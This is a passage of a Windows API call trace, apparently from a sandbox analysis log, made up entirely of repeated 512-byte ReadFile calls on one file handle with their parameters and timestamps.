lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.108] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.108] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.108] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.206] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.206] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.206] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, 